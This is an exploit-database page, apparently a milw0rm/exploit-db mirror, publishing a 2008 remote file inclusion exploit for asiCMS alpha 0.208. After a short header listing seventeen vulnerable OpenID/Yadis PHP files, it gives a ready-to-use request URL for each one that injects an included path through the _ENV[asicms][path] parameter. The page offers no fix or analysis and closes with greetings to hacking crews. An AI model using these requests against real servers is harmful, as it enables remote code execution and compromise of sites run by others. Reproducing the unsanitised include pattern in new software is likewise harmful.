[] NeoSense
E X P L O I T S
title author type platform port cve id

asiCMS alpha 0.208 - Multiple Remote File Inclusions

Author: NoGe
type: webapps
platform: php
port: 
date_added: 2008-10-05 
date_updated: 2016-12-30 
verified: 1 
codes: OSVDB-49024;CVE-2008-4529;OSVDB-49023;OSVDB-49022;OSVDB-49021;OSVDB-49020;OSVDB-49019;OSVDB-49018;OSVDB-49017;OSVDB-49016;OSVDB-49015;OSVDB-49014;OSVDB-49013;OSVDB-49012;OSVDB-49011;OSVDB-49010;OSVDB-49009;OSVDB-49008 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comasicms-0-208.zip
===========================================================================================


  [o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability

       Software : asiCMS version alpha 0.208
       Vendor   : http://asicms.sourceforge.net/
       Download : http://sourceforge.net/project/showfiles.php?group_id=203457
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com


===========================================================================================


  [o] Vulnerable file

       classes/Auth/OpenID/Association.php
       classes/Auth/OpenID/BigMath.php
       classes/Auth/OpenID/DiffieHellman.php
       classes/Auth/OpenID/DumbStore.php
       classes/Auth/OpenID/Extension.php
       classes/Auth/OpenID/FileStore.php
       classes/Auth/OpenID/HMAC.php
       classes/Auth/OpenID/MemcachedStore.php
       classes/Auth/OpenID/Message.php
       classes/Auth/OpenID/Nonce.php
       classes/Auth/OpenID/SQLStore.php
       classes/Auth/OpenID/SReg.php
       classes/Auth/OpenID/TrustRoot.php
       classes/Auth/OpenID/URINorm.php
       classes/Auth/Yadis/XRDS.php
       classes/Auth/Yadis/XRI.php
       classes/Auth/Yadis/XRIRes.php

      All the file is affected by _ENV[asicms][path] variable



  [o] Exploit

       http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=


===========================================================================================


  [o] Greetz

       MainHack BrotherHood [ www.mainhack.com ]
       VOP Crew [ Vaksin13 OoN_BoY Paman ]
       H312Y yooogy mousekill }^-^{ k1tk4t
       skulmatic olibekas ulga Cungkee str0ke


===========================================================================================

# milw0rm.com [2008-10-06]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.